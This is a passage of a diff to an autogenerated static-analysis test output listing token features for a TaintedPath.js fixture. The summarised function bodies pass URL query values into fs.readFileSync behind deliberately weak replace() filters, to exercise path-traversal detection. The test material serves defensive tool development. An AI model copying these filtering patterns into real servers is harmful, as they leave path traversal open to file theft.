(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:62 | pathMod ... replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:62 | pathMod ... replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:62 | pathMod ... replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:84 | exceptional return of pathMod ... +/, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:84 | exceptional return of pathMod ... +/, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:84 | exceptional return of pathMod ... +/, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:84 | exceptional return of pathMod ... +/, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:29:195:84 | exceptional return of pathMod ... +/, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:195:29:195:84 | pathMod ... +/, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:195:29:195:84 | pathMod ... +/, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:195:29:195:84 | pathMod ... +/, '') | calleeImports | fs | @@ -6689,6 +65932,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:195:29:195:84 | pathMod ... +/, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:195:29:195:84 | pathMod ... +/, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:195:29:195:84 | pathMod ... +/, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:195:40:195:48 | normalize | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:40:195:48 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:40:195:48 | normalize | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:40:195:48 | normalize | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:40:195:48 | normalize | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:195:50:195:53 | path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/TaintedPath.js:195:50:195:53 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:195:50:195:53 | path | calleeImports | path | @@ -6698,6 +65946,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:195:50:195:53 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:195:50:195:53 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:195:50:195:53 | path | receiverName | pathModule | +| autogenerated/TaintedPath/TaintedPath.js:195:56:195:62 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:56:195:62 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:195:56:195:62 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:195:56:195:62 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:195:56:195:62 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:195:64:195:79 | /^(\\.\\.[\\/\\\\])+/ | CalleeFlexibleAccessPath | pathModule.normalize().replace | | autogenerated/TaintedPath/TaintedPath.js:195:64:195:79 | /^(\\.\\.[\\/\\\\])+/ | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:195:64:195:79 | /^(\\.\\.[\\/\\\\])+/ | calleeImports | path | @@ -6714,6 +65967,73 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:195:82:195:83 | '' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | | autogenerated/TaintedPath/TaintedPath.js:195:82:195:83 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:195:82:195:83 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:198:1:198:41 | import ... e-url'; | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:198:1:198:41 | import ... e-url'; | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:198:1:198:41 | import ... e-url'; | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:198:8:198:19 | normalizeUrl | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:198:8:198:19 | normalizeUrl | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:198:8:198:19 | normalizeUrl | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:198:8:198:19 | normalizeUrl | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:198:8:198:19 | normalizeUrl | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:198:8:198:19 | normalizeUrl | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:198:8:198:19 | normalizeUrl | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:198:8:198:19 | normalizeUrl | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:198:8:198:19 | normalizeUrl | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:198:8:198:19 | normalizeUrl | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:198:26:198:40 | 'normalize-url' | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:198:26:198:40 | 'normalize-url' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:198:26:198:40 | 'normalize-url' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:5:200:10 | server | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:5:200:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:200:5:200:10 | server | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:5:207:2 | server ... T OK\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:5:207:2 | server ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:200:5:207:2 | server ... T OK\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:14:200:17 | http | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:14:200:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:200:14:200:17 | http | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:14:200:30 | http.createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:14:200:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:200:14:200:30 | http.createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:14:207:2 | exceptional return of http.cr ... T OK\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:14:207:2 | exceptional return of http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:200:14:207:2 | exceptional return of http.cr ... T OK\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:14:207:2 | http.cr ... T OK\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:14:207:2 | http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:200:14:207:2 | http.cr ... T OK\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:19:200:30 | createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:19:200:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:200:19:200:30 | createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | fs | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | normalizeUrl | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | normalizeUrl | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | normalizeUrl | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | normalizeUrl | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | normalizeUrl | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | require | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | this | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | this | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:200:32:200:31 | this | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | 'arguments' object of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | exceptional return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | exceptional return of anonymous function | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | exceptional return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | functio ... OT OK\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | functio ... OT OK\\n} | calleeImports | http | @@ -6721,6 +66041,61 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | functio ... OT OK\\n} | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | functio ... OT OK\\n} | receiverName | http | +| autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | return of anonymous function | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:200:32:207:1 | return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:41:200:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:41:200:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:41:200:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:200:41:200:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:41:200:43 | req | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:200:41:200:43 | req | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:200:41:200:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:200:41:200:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:200:41:200:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:41:200:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:46:200:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:46:200:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:46:200:48 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:200:46:200:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:200:46:200:48 | res | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:200:46:200:48 | res | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:200:46:200:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:200:46:200:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:200:46:200:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:200:46:200:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:202:9:202:10 | qs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:202:9:202:10 | qs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:202:9:202:10 | qs | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:202:9:202:10 | qs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:202:9:202:10 | qs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:202:9:202:26 | qs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:202:9:202:26 | qs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:202:9:202:26 | qs | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:202:9:202:26 | qs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:202:9:202:26 | qs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:202:9:202:26 | qs = require("qs") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:202:9:202:26 | qs = require("qs") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:202:9:202:26 | qs = require("qs") | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:202:9:202:26 | qs = require("qs") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:202:9:202:26 | qs = require("qs") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:202:14:202:20 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:202:14:202:20 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:202:14:202:20 | require | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:202:14:202:20 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:202:14:202:20 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:202:14:202:26 | exceptional return of require("qs") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:202:14:202:26 | exceptional return of require("qs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:202:14:202:26 | exceptional return of require("qs") | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:202:14:202:26 | exceptional return of require("qs") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:202:14:202:26 | exceptional return of require("qs") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:202:14:202:26 | require("qs") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:202:14:202:26 | require("qs") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:202:14:202:26 | require("qs") | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req url foo parseqs require parseqs res write fs readFileSync parseqs decode req url foo | +| autogenerated/TaintedPath/TaintedPath.js:202:14:202:26 | require("qs") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:202:14:202:26 | require("qs") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:202:22:202:25 | "qs" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/TaintedPath.js:202:22:202:25 | "qs" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:202:22:202:25 | "qs" | calleeImports | | @@ -6729,6 +66104,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:202:22:202:25 | "qs" | enclosingFunctionBody | req res qs require qs res write fs readFileSync qs parse req url foo res write fs readFileSync qs parse normalizeUrl req 